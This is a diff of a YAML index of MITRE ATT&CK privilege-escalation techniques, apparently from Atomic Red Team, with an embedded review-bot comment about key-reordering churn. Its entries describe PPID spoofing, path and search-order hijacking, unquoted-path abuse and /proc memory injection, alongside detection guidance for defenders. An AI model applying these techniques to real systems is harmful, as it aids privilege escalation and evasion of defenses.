+ - Process monitoring
+ - Access tokens
+ - API monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.007:
technique:
@@ -4042,25 +4144,25 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T18:28:07.793Z'
created: '2020-01-24T14:26:51.207Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Windows Registry
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
in most environments. Monitor process executions and investigate any child
processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh
registry key for any new or suspicious entries that do not correlate with
known system files or benign software. (Citation: Demaske Netsh Persistence)'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Windows Registry
+ - DLL monitoring
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ x_mitre_platforms:
+ - Windows
identifier: T1546.007
atomic_tests:
- name: Netsh Helper DLL Registration
@@ -4114,18 +4216,18 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T23:45:25.625Z'
created: '2020-01-10T18:01:03.666Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
that could be indicative of abnormal programs or executables running upon
logon.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1134.004:
technique:
@@ -4154,10 +4256,10 @@ privilege-escalation:
url: https://blog.xpnsec.com/becoming-system/
description: Chester, A. (2017, November 20). Alternative methods of becoming
SYSTEM. Retrieved June 4, 2019.
- - description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags.
- Retrieved June 4, 2019.
+ - source_name: Microsoft Process Creation Flags May 2018
url: https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags
- source_name: Microsoft Process Creation Flags May 2018
+ description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags.
+ Retrieved June 4, 2019.
- description: Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2)
Ataware Ransomware Part 3. Retrieved June 6, 2019.
url: https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3
@@ -4169,7 +4271,7 @@ privilege-escalation:
description: |-
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
- Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [VBScript](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
+ Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
id: attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a
@@ -4179,28 +4281,28 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:45:30.415Z'
+ modified: '2020-04-16T19:37:02.030Z'
created: '2020-02-18T18:22:41.448Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - Windows event logs
+ x_mitre_contributors:
+ - Wayne Silva, F-Secure Countercept
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_defense_bypassed:
+ - Heuristic Detection
+ - Host forensic analysis
x_mitre_detection: |-
Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)
Monitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.
- x_mitre_defense_bypassed:
- - Heuristic Detection
- - Host forensic analysis
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Wayne Silva, Countercept
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1134.004
atomic_tests:
- name: Parent PID Spoofing using PowerShell
@@ -4256,7 +4358,7 @@ privilege-escalation:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Path Interception
description: |-
- **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**
+ **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**
Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)
@@ -4326,15 +4428,19 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-30T13:45:24.192Z'
+ modified: '2020-07-06T18:49:35.645Z'
created: '2017-05-31T21:30:36.140Z'
- x_mitre_deprecated: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_contributors:
- - Stefan Kanthak
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_detection: "Monitor file creation for files named after partial directories
and in locations that may be searched for common processes through the environment
variable, or otherwise should not be user writable. Monitor the executing
@@ -4347,20 +4453,27 @@ privilege-escalation:
that could lead to other activities, such as network connections made for
Command and Control, learning details about the environment through Discovery,
and Lateral Movement."
- x_mitre_effective_permissions:
- - User
- - Administrator
- - SYSTEM
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_deprecated: true
atomic_tests: []
T1574.007:
technique:
+ id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
+
+ The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
+
+ For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
+ name: Path Interception by PATH Environment Variable
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.007
@@ -4368,17 +4481,6 @@ privilege-escalation:
- external_id: CAPEC-capec
source_name: capec
url: https://capec.mitre.org/data/definitions/capec.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Path Interception by PATH Environment Variable
- description: |-
- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
-
- The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
-
- For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
- id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -4387,7 +4489,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:59:42.456Z'
+ modified: '2020-06-20T22:02:40.983Z'
created: '2020-03-13T14:10:43.424Z'
x_mitre_platforms:
- Windows
@@ -4403,10 +4505,33 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
atomic_tests: []
T1574.008:
technique:
+ created: '2020-03-13T17:48:58.999Z'
+ modified: '2020-03-26T20:03:27.496Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
+
+ Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
+
+ For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
+
+ Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
+ name: Path Interception by Search Order Hijacking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.008
@@ -4429,29 +4554,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Path Interception by Search Order Hijacking
- description: |-
- Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
-
- Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
-
- For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
-
- Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
- id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T20:03:27.496Z'
- created: '2020-03-13T17:48:58.999Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -4476,17 +4578,16 @@ privilege-escalation:
atomic_tests: []
T1574.009:
technique:
- id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
- description: |-
- Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
-
- Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
-
- This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
- name: Path Interception by Unquoted Path
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2020-03-13T13:51:58.519Z'
+ modified: '2020-03-26T19:55:39.867Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1574.009
@@ -4510,16 +4611,17 @@ privilege-escalation:
url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
description: absolomb. (2018, January 26). Windows Privilege Escalation Guide.
Retrieved August 10, 2018.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T19:55:39.867Z'
- created: '2020-03-13T13:51:58.519Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Path Interception by Unquoted Path
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
+
+ Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
+
+ This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
+ id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
@@ -4565,6 +4667,14 @@ privilege-escalation:
elevation_required: true
T1547.011:
technique:
+ created: '2020-01-24T20:02:59.149Z'
+ modified: '2020-06-20T19:57:36.136Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
id: attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a
description: "Adversaries may modify plist files to run a program during system
boot or user login. Property list (plist) files contain all of the information
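Review bot: The key order inside each `technique` mapping is not stable between refreshes, so this hunk and almost every one below it is pure reordering churn (`created`/`modified`/`kill_chain_phases`/`type`/`id` move ahead of `description` here, the `x_mitre_*` keys are reversed in the following hunks) that hides the handful of real content changes: the `modified` timestamps, `Process whitelisting` → `Application control` under `x_mitre_defense_bypassed`, the `whitelisted` → `allowed` wording in the T1547.011 detection text, the `en-us` Red Hat URL correction, and the removal of `macOS` from the T1055.009 platform list. If this index is produced by a generator from the upstream ATT&CK bundle, emitting mappings with a fixed key order would make future refreshes diff only on content and let a reviewer see at a glance whether a platform drop such as the T1055.009 one is intended. The enclosing `privilege-escalation:` mapping starts and ends outside this hunk.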
@@ -4621,31 +4731,23 @@ privilege-escalation:
description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web
traffic. Retrieved July 10, 2017.
source_name: OSX.Dok Malware
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T19:47:38.978Z'
- created: '2020-01-24T20:02:59.149Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
-
- All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and whitelisted for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)
-
- Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.
+ x_mitre_platforms:
+ - macOS
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_platforms:
- - macOS
+ x_mitre_detection: |-
+ File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
+
+ All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)
+
+ Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1547.011
atomic_tests:
- name: Plist Modification
@@ -4710,17 +4812,13 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-01-24T19:46:27.750Z'
created: '2020-01-24T19:46:27.750Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Stefan Kanthak
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - File monitoring
- - API monitoring
- - DLL monitoring
- - Windows Registry
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - SYSTEM
+ - Administrator
x_mitre_detection: "Monitor process API calls to AddMonitor.(Citation:
AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are
abnormal. New DLLs written to the System32 directory that do not correlate
@@ -4728,13 +4826,17 @@ privilege-escalation:
writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors.
Run the Autoruns utility, which checks for this Registry key as a persistence
mechanism (Citation: TechNet Autoruns)"
- x_mitre_permissions_required:
- - SYSTEM
- - Administrator
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - API monitoring
+ - DLL monitoring
+ - Windows Registry
+ - Process monitoring
+ x_mitre_contributors:
+ - Stefan Kanthak
+ - Travis Smith, Tripwire
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1055.002:
technique:
@@ -4772,12 +4874,16 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:34:26.937Z'
+ modified: '2020-06-20T22:19:58.813Z'
created: '2020-01-14T01:27:31.344Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -4789,14 +4895,10 @@ privilege-escalation:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.013:
technique:
@@ -4850,15 +4952,11 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T21:31:31.082Z'
created: '2020-01-24T15:11:02.758Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Allen DeRyke, ICE
- x_mitre_data_sources:
- - PowerShell logs
- - File monitoring
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: |-
Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
@@ -4868,11 +4966,15 @@ privilege-escalation:
* $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - PowerShell logs
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_contributors:
+ - Allen DeRyke, ICE
+ x_mitre_platforms:
+ - Windows
identifier: T1546.013
atomic_tests:
- name: Append malicious start-process cmdlet
@@ -4909,7 +5011,26 @@ privilege-escalation:
name: powershell
T1055.009:
technique:
- id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1055.009
+ url: https://attack.mitre.org/techniques/T1055/009
+ - url: http://hick.org/code/skape/papers/needle.txt
+ description: skape. (2003, January 19). Linux x86 run-time process manipulation.
+ Retrieved December 20, 2017.
+ source_name: Uninformed Needle
+ - source_name: GDS Linux Injection
+ url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
+ description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code
+ Injection Without Ptrace(2). Retrieved February 21, 2020.
+ - source_name: DD Man
+ url: http://man7.org/linux/man-pages/man1/dd.1.html
+ description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
+ February 21, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
privileges. Proc memory injection is a method of executing arbitrary code
@@ -4933,36 +5054,17 @@ privilege-escalation:
and possibly elevated privileges. Execution via proc memory injection may
also evade detection from security products since the execution is masked
under a legitimate process. "
- name: Proc Memory
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1055.009
- url: https://attack.mitre.org/techniques/T1055/009
- - url: http://hick.org/code/skape/papers/needle.txt
- description: skape. (2003, January 19). Linux x86 run-time process manipulation.
- Retrieved December 20, 2017.
- source_name: Uninformed Needle
- - source_name: GDS Linux Injection
- url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
- description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code
- Injection Without Ptrace(2). Retrieved February 21, 2020.
- - source_name: DD Man
- url: http://man7.org/linux/man-pages/man1/dd.1.html
- description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
- February 21, 2020.
+ id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T20:33:52.548Z'
+ modified: '2020-06-20T22:25:55.331Z'
created: '2020-01-14T01:34:10.588Z'
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
- Anti-virus
x_mitre_data_sources:
- Process monitoring
@@ -4976,7 +5078,6 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- - macOS
atomic_tests: []
T1055.013:
technique:
@@ -5052,29 +5153,29 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:05:42.921Z'
+ modified: '2020-06-20T22:27:21.304Z'
created: '2020-01-14T17:19:50.978Z'
